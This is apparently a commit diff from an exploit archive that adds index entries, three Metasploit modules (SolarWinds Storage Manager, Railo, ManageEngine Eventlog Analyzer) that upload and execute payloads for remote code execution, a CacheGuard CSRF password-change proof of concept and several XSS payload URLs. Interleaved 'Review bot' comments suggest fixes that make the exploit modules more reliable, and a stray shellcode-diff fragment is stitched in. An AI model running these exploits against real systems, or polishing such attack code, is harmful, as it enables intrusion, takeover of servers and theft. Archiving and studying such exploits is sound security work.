Updated 09_17_2014
parent
1d4c17cad7
commit
d1f84651f9
23 changed files with 1238 additions and 2 deletions
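--- a/files.csv
+++ b/files.csv
@@ -31197,3 +31197,24 @@ id,file,description,date,author,platform,type,port
 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
+34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
+34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
+34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
+34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 'login.php' Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
+34653,platforms/php/webapps/34653.txt,"e107 0.7.23 Multiple SQL Injection Vulnerabilities",2010-09-17,"High-Tech Bridge SA",php,webapps,0
+34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading Arbitrary Code Execution Vulnerability",2010-09-20,anT!-Tr0J4n,windows,remote,0
+34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0
+34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 linkvideos_listing.php category Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b embed.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
+34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
+34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
+34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
+34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
+34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
+34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF Vulnerability",2014-09-15,"William Costa",linux,webapps,8090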
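--- a/platforms/java/remote/34671.rb
+++ b/platforms/java/remote/34671.rb
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'SolarWinds Storage Manager Authentication Bypass',
+'Description' => %q{
+This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
+The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication
+with specially crafted URLs. After bypassing authentication, is possible to use a file
+upload function to achieve remote code execution. This module has been tested successfully
+in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and
+Linux 64 bits operating systems.
+},
+'Author' =>
+[
+'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+'juan vazquez' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['ZDI', '14-299']
+],
+'Privileged' => true,
+'Platform' => %w{ linux win },
+'Arch' => ARCH_JAVA,
+'Targets' =>
+[
+['Solarwinds Store Manager <= 5.7.1', {}]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Aug 19 2014'))
+
+register_options(
+[
+Opt::RPORT(9000)
+], self.class)
+end
+
+def check
+res = send_request_cgi({
+'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
+'method' => 'POST',
+'ctype' => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
+})
+
+if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
+return Exploit::CheckCode::Vulnerable
+end
+
+Exploit::CheckCode::Safe
+end
+
+def exploit
+jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
+if upload(jsp_info, jsp_path)
+print_good("#{peer} - JSP payload uploaded successfully")
+else
+fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
+end
+
+res = execute(jsp_info)
+
+if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
+upload_path = $1
+print_good("#{peer} - Working directory found in #{upload_path}")
+register_file_for_cleanup(::File.join(upload_path, jsp_info))
+else
+print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
+print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
+end
+
+jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
+if upload(jsp_payload, payload.encoded)
+print_good("#{peer} - JSP payload uploaded successfully")
+else
+fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
+end
+
+if upload_path
+register_file_for_cleanup(::File.join(upload_path, jsp_payload))
+else
+print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
+end
+
+print_status("#{peer} - Executing payload...")
+execute(jsp_payload, 1)
+end
+
+def execute(jsp_name, time_out = 20)
+res = send_request_cgi({
+'uri' => normalize_uri("/", "images", "..", jsp_name),
+'method' => 'GET'
+}, time_out)
+
+res
+end
+
+def upload(file_name, contents)
+post_data = Rex::MIME::Message.new
+post_data.add_part(contents,
+"application/octet-stream",
+nil,
+"form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")
+
+res = send_request_cgi({
+'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
+'method' => 'POST',
+'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+'data' => post_data.to_s
+})
+
+if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
+return true
+end
+
+false
+end
+
+def jsp_path
+jsp =<<-EOS
+<%@ page language="Java" import="java.util.*"%>
+<%
+out.println("Path:" + System.getProperty("server.webapp.root"));
+%>
+EOS
+
+jsp
+end
+
+end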
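Review bot: The success message printed after the information-gathering upload in `exploit`, `print_good("#{peer} - JSP payload uploaded successfully")` on the line following `if upload(jsp_info, jsp_path)`, describes the wrong artifact: that branch uploaded the information-gathering JSP, as the preceding `print_status` and the `fail_with` in the else branch both say, so it should read `print_good("#{peer} - Information Gathering JSP uploaded successfully")`. The product name is also inconsistent within the module: the 'Name' says 'SolarWinds Storage Manager' while the description's last sentence and the target name say 'Store Manager'. As a point of style, `upload_path = $1` would read more clearly as `upload_path = Regexp.last_match(1)`, and `jsp_path` returns JSP source rather than a filesystem path, so a one-line comment above its `def`, such as `# JSP source that echoes server.webapp.root, used to locate uploaded files for cleanup`, would prevent misreading.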
@ -17,7 +17,7 @@ open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , clo
|
|||
setreuid() , execve('/bin/sh')
|
||||
|
||||
|
||||
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
|
||||
root@user:~/Desktop/xpl# objdump -d f.o
|
||||
|
||||
f.o: file format elf32-i386
|
||||
|
||||
|
@ -190,7 +190,7 @@ Disassembly of section .text:
|
|||
203: b0 01 mov $0x1,%al
|
||||
205: b3 01 mov $0x1,%bl
|
||||
207: cd 80 int $0x80
|
||||
root@g3n3rall:~/Desktop/xpl#
|
||||
root@user:~/Desktop/xpl#
|
||||
|
||||
|
||||
|
||||
|
|
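--- a/platforms/linux/webapps/34672.txt
+++ b/platforms/linux/webapps/34672.txt
@@ -0,0 +1,104 @@
+I. VULNERABILITY
+
+-------------------------
+
+CSRF vulnerabilities in CacheGuard-OS v5.7.7
+
+II. BACKGROUND
+
+-------------------------
+
+CacheGuard is an All-in-One Web Security Gateway providing firewall,
+web antivirus, caching, compression, URL filtering, proxy, high
+availability, content filtering, bandwidth saving, bandwidth shaping,
+Quality of Service and more.
+
+
+
+III. DESCRIPTION
+
+-------------------------
+
+Has been detected a CSRF vulnerability in CacheGuard in
+"/gui/password-wadmin.apl"
+
+
+
+IV. PROOF OF CONCEPT
+
+-------------------------
+
+The application does not validate the parameter any csrf_token
+"/gui/password-wadmin.apl".
+
+
+
+<html>
+
+
+
+<body onload="CSRF.submit();">
+
+<br>
+
+<br>
+
+
+
+<form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl"
+method="post" name="CSRF">
+
+<input name="password1" value="admin@1234" type=hidden> </input>
+
+<input name="password2" value="admin@1234" type=hidden> </input>
+
+</form>
+
+
+
+</body>
+
+</html>
+
+
+
+V. BUSINESS IMPACT
+
+-------------------------
+
+
+
+CSRF allow the execution attackers to modify settings or change
+password of user administrator in CacheGuard, because this functions
+are not protected by CSRF-Tokens.
+
+
+
+VI. REQUIREMENTS
+
+-----------------------
+
+An Attacker needs to know the IP of the device.
+
+An Administrator needs an authenticated connection to the device.
+
+
+
+VII. SYSTEMS AFFECTED
+
+-------------------------
+
+Try CacheGuard-OS v5.7.7
+
+
+
+VIII. SOLUTION
+
+-------------------------
+
+All functions must be protected by CSRF-Tokens.
+
+http://www.kb.cert.org/vuls/id/241508
+
+By William Costa
+william.costa no spam gmail.com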
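--- a/platforms/multiple/remote/34669.rb
+++ b/platforms/multiple/remote/34669.rb
@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::HttpServer
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Railo Remote File Include',
+'Description' => '
+This module exploits a remote file include vulnerability in Railo,
+tested against version 4.2.1. First, a call using a vulnerable
+<cffile> line in thumbnail.cfm allows an atacker to download an
+arbitrary PNG file. By appending a .cfm, and taking advantage of
+a directory traversal, an attacker can append cold fusion markup
+to the PNG file, and have it interpreted by the server. This is
+used to stage and execute a fully-fledged payload.
+',
+'License' => MSF_LICENSE,
+'Author' => [
+'Bryan Alexander <drone@ballastsecurity.net>', # Discovery/PoC
+'bperry' # metasploited
+],
+'References' => [
+['CVE', '2014-5468'],
+['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
+],
+'Payload' => {
+'Space' => 99999, # if there is disk space, I think we will fit
+'BadChars' => "",
+'DisableNops' => true,
+'Compat' => {
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
+}
+},
+'Platform' => %w( unix ),
+'Targets' =>
+[
+[
+'Automatic',
+{
+'Platform' => [ 'unix' ],
+'Arch' => ARCH_CMD
+}
+]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Aug 26 2014'))
+
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
+OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
+], self.class)
+end
+
+def check
+md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png
+
+res = send_request_cgi(
+'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
+)
+
+if !res
+fail_with(Failure::Unknown, 'Server did not respond')
+elsif !res.body
+fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
+end
+
+new_md5 = Rex::Text.md5(res.body)
+
+return Exploit::CheckCode::Appears if new_md5 == md5
+
+Exploit::CheckCode::Safe
+end
+
+def exploit
+if datastore['SRVHOST'] == '0.0.0.0'
+fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
+end
+
+url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
+
+@shell_name = Rex::Text.rand_text_alpha(15)
+stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
+
+start_service('Uri' => {
+'Proc' => proc do |cli, req|
+on_request_stager(cli, req)
+end,
+'Path' => '/' + stager_name
+})
+
+start_service('Uri' => {
+'Proc' => proc do |cli, req|
+on_request_shell(cli, req)
+end,
+'Path' => '/' + @shell_name
+})
+
+wh = '5000' # width and height
+
+res = send_request_cgi(
+'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
+'vars_get' => {
+'img' => url + '/' + stager_name,
+'height' => wh,
+'width' => wh
+}
+)
+
+if !res
+fail_with(Failure::Unknown, 'Server did not respond')
+elsif res.code != 500
+fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
+end
+
+print_status('Waiting for first stage to download...')
+
+i = datastore['STAGEWAIT']
+while !@staged && i > 0
+select(nil, nil, nil, 1)
+print_status("Waiting for #{i} more seconds...")
+i = i - 1
+end
+
+@staged = false
+
+if i == 0
+fail_with(Failure::Unknown, 'Server did not request the stager.')
+end
+
+hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET
+
+hash.upcase!
+
+print_status('Executing stager')
+
+send_request_cgi(
+'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
+'vars_get' => {
+'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
+'thistag.executionmode' => 'start'
+}
+)
+end
+
+def on_request_shell(cli, _request)
+print_status('Sending payload')
+send_response(cli, payload.encoded, {})
+handler(cli)
+end
+
+def on_request_stager(cli, _request)
+url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
+
+stager = "<cfhttp method='get' url='#{url}'"
+stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
+stager << " file='#{@shell_name}'>"
+stager << "<cfexecute name='sh' arguments='#{@shell_name}' timeout='99999'></cfexecute>"
+
+png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
+png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='
+
+# A very small PNG file
+png = Rex::Text.decode_base64(png)
+
+stager.each_byte do |b|
+png << b
+end
+
+png << 0x00
+
+print_status('Sending stage. This might be sent multiple times.')
+send_response(cli, png, 'Content-Type' => 'image/png')
+
+@staged = true
+
+handler(cli)
+end
+end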
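Review bot: In `exploit`, success of the stager wait is judged by the counter rather than by the flag: after the `while !@staged && i > 0` loop, `@staged` is reset to `false` before `if i == 0` is evaluated, so a stager request that arrives during the final one-second `select` leaves `i == 0` and the run aborts with 'Server did not request the stager.' even though `on_request_stager` already served the stage. Test the flag and reset it afterwards: `fail_with(Failure::Unknown, 'Server did not request the stager.') unless @staged` followed by `@staged = false`. Separately, `check` calls `fail_with` when the server does not respond or returns no body, which aborts the check with an exception instead of reporting a result; returning `Exploit::CheckCode::Unknown` from those two branches is the conventional outcome for a check that cannot decide.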
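--- a/platforms/multiple/remote/34670.rb
+++ b/platforms/multiple/remote/34670.rb
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+include Msf::Exploit::EXE
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
+'Description' => %q{
+This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
+The vulnerability exists in the agentUpload servlet which accepts unauthenticated
+file uploads and handles zip file contents in a insecure way. By combining both
+weaknesses a remote attacker can achieve remote code execution. This module has been
+tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
+between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
+while versions 8.1+ are only exploitable via a JSP upload.
+},
+'Author' =>
+[
+'h0ng10', # Vulnerability discovery
+'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'CVE', '2014-6037' ],
+[ 'OSVDB', '110642' ],
+[ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
+[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
+],
+'DefaultOptions' => { 'WfsDelay' => 5 },
+'Privileged' => false, # Privileged on Windows but not on Linux targets
+'Platform' => %w{ java linux win },
+'Targets' =>
+[
+[ 'Automatic', { } ],
+[ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
+{
+'Platform' => 'java',
+'Arch' => ARCH_JAVA,
+'WfsDelay' => 30
+}
+],
+[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
+{
+'Platform' => 'win',
+'Arch' => ARCH_X86
+}
+],
+[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
+{
+'Platform' => 'linux',
+'Arch' => ARCH_X86
+}
+]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Aug 31 2014'))
+
+register_options(
+[
+Opt::RPORT(8400),
+OptInt.new('SLEEP',
+[true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
+], self.class)
+end
+
+
+def get_version
+res = send_request_cgi({
+'uri' => normalize_uri("event/index3.do"),
+'method' => 'GET'
+})
+
+if res and res.code == 200
+if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
+return $1
+end
+end
+
+return "0"
+end
+
+
+def check
+version = get_version
+if version >= "7" and version <= "9"
+# version 7 to < 8.1 detection
+res = send_request_cgi({
+'uri' => normalize_uri("event/agentUpload"),
+'method' => 'GET'
+})
+if res and res.code == 405
+return Exploit::CheckCode::Appears
+end
+
+# version 8.1+ detection
+res = send_request_cgi({
+'uri' => normalize_uri("agentUpload"),
+'method' => 'GET'
+})
+if res and res.code == 405 and version == 8
+return Exploit::CheckCode::Appears
+else
+# We can't be sure that it is vulnerable in version 9
+return Exploit::CheckCode::Detected
+end
+
+else
+return Exploit::CheckCode::Safe
+end
+end
+
+
+def create_zip_and_upload(payload, target_path, is_payload = true)
+# Zipping with CM_STORE to avoid errors decompressing the zip
+# in the Java vulnerable application
+zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+zip.add_file(target_path, payload)
+
+post_data = Rex::MIME::Message.new
+post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
+
+data = post_data.to_s
+
+if is_payload
+print_status("#{peer} - Uploading payload...")
+end
+res = send_request_cgi({
+'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
+'method' => 'POST',
+'data' => data,
+'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+})
+
+if res and res.code == 200 and res.body.empty?
+if is_payload
+print_status("#{peer} - Payload uploaded successfully")
+end
+register_files_for_cleanup(target_path.gsub("../../", "../"))
+return true
+else
+return false
+end
+end
+
+
+def pick_target
+return target if target.name != 'Automatic'
+
+print_status("#{peer} - Determining target")
+
+version = get_version
+
+if version == "7"
+return targets[1]
+end
+
+os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+target_dir = "../../webapps/event/"
+if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
+if version == "8"
+# Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
+return targets[1]
+end
+return nil
+end
+
+res = send_request_cgi({
+'uri' => normalize_uri(jsp_name),
+'method' => 'GET'
+})
+
+if res and res.code == 200
+if res.body.to_s =~ /Windows/
+return targets[2]
+else
+# assuming Linux
+return targets[3]
+end
+end
+
+return nil
+end
+
+
+def generate_jsp_payload
+opts = {:arch => @my_target.arch, :platform => @my_target.platform}
+payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
+exe = generate_payload_exe(opts)
+base64_exe = Rex::Text.encode_base64(exe)
+
+native_payload_name = rand_text_alpha(rand(6)+3)
+ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
+
+var_raw = rand_text_alpha(rand(8) + 3)
+var_ostream = rand_text_alpha(rand(8) + 3)
+var_buf = rand_text_alpha(rand(8) + 3)
+var_decoder = rand_text_alpha(rand(8) + 3)
+var_tmp = rand_text_alpha(rand(8) + 3)
+var_path = rand_text_alpha(rand(8) + 3)
+var_proc2 = rand_text_alpha(rand(8) + 3)
+
+if @my_target['Platform'] == 'linux'
+var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
+chmod = %Q|
+Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
+Thread.sleep(200);
+|
+
+var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
+cleanup = %Q|
+Thread.sleep(200);
+Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
+|
+else
+chmod = ''
+cleanup = ''
+end
+
+jsp = %Q|
+<%@page import="java.io.*"%>
+<%@page import="sun.misc.BASE64Decoder"%>
+<%
+try {
+String #{var_buf} = "#{base64_exe}";
+BASE64Decoder #{var_decoder} = new BASE64Decoder();
+byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
+
+File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
+String #{var_path} = #{var_tmp}.getAbsolutePath();
+
+BufferedOutputStream #{var_ostream} =
+new BufferedOutputStream(new FileOutputStream(#{var_path}));
+#{var_ostream}.write(#{var_raw});
+#{var_ostream}.close();
+#{chmod}
+Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
+#{cleanup}
+} catch (Exception e) {
+}
+%>
+|
+
+jsp = jsp.gsub(/\n/, '')
+jsp = jsp.gsub(/\t/, '')
+jsp = jsp.gsub(/\x0d\x0a/, "")
+jsp = jsp.gsub(/\x0a/, "")
+
+return jsp
+end
+
+
+def exploit_native
+# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
+# Fail if this is the case and ask the user to select an appropriate payload.
+if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
+fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
+end
+
+jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+target_dir = "../../webapps/event/"
+
+jsp_payload = generate_jsp_payload
+if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
+fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
+end
+
+return jsp_name
+end
+
+
+def exploit_java
+# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
+# Fail if this is the case and ask the user to select an appropriate payload.
+if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
+fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
+end
+
+target_dir = "../../server/default/deploy/"
+
+# First we generate the WAR with the payload...
+war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+war_payload = payload.encoded_war({ :app_name => war_app_base })
+
+# ... and then we create an EAR file that will contain it.
+ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
+
+# Zipping with CM_STORE to avoid errors while decompressing the zip
+# in the Java vulnerable application
+ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+ear_file.add_file(war_app_base + ".war", war_payload.to_s)
+ear_file.add_file("META-INF/application.xml", app_xml)
+ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
+
+if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
+fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
+end
+
+print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
+sleep(datastore['SLEEP'])
+return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
+end
+
+
+def exploit
+if datastore['SLEEP'] < 0
+print_error("The SLEEP datastore option shouldn't be negative")
+return
+end
+
+@my_target = pick_target
+if @my_target.nil?
+print_error("#{peer} - Unable to select a target, we must bail.")
+return
+else
+print_status("#{peer} - Selected target #{@my_target.name}")
+end
+
+if @my_target == targets[1]
+exploit_path = exploit_java
+else
+exploit_path = exploit_native
+end
+
+print_status("#{peer} - Executing payload...")
+send_request_cgi({
+'uri' => normalize_uri(exploit_path),
+'method' => 'GET'
+})
+end
+end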
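Review bot: In `check`, the 8.1+ branch `if res and res.code == 405 and version == 8` can never be true, because `get_version` returns a String (`$1` from the regex, or `"0"`) and `pick_target` compares the same value as `version == "7"` / `version == "8"`; the comparison with the Integer 8 always fails, so an 8.x install that answers 405 on `agentUpload` is reported as `Detected` instead of `Appears`. Change it to `if res and res.code == 405 and version == "8"`. A second point of style: `create_zip_and_upload(payload, target_path, is_payload = true)` names its first parameter `payload`, shadowing the module's `payload` accessor inside the method, and `generate_jsp_payload` assigns `payload = exploit_regenerate_payload(...)` to a local that is never read afterwards (the call may still be needed for its side effect, but the assignment is not); renaming the parameter, for example to `contents`, and dropping the unused assignment would remove the ambiguity. The `if not ...` and `and` forms throughout would be `unless` and `&&` under the usual Ruby style guide.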
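--- a/platforms/php/webapps/34649.txt
+++ b/platforms/php/webapps/34649.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43290/info
+
+Netautor Professional is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Netautor Professional 5.5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E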
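--- a/platforms/php/webapps/34650.txt
+++ b/platforms/php/webapps/34650.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43297/info
+
+e-Soft24 Flash Games Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+e-Soft24 Flash Games Script 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/search_results.php?search_id='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&search=Search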
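--- a/platforms/php/webapps/34651.txt
+++ b/platforms/php/webapps/34651.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/43303/info
+
+e-Soft24 Jokes Portal Script Seo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+e-Soft24 Jokes Portal Script Seo 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/SearchAction.php?what='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&ssub=GO
+
+http://www.example.com/forgot.html => put : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
+
+http://www.example.com/scripts/jokes-portal/SearchAction.php?what=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&ssub=GO
+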
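--- a/platforms/php/webapps/34652.txt
+++ b/platforms/php/webapps/34652.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/43305/info
+
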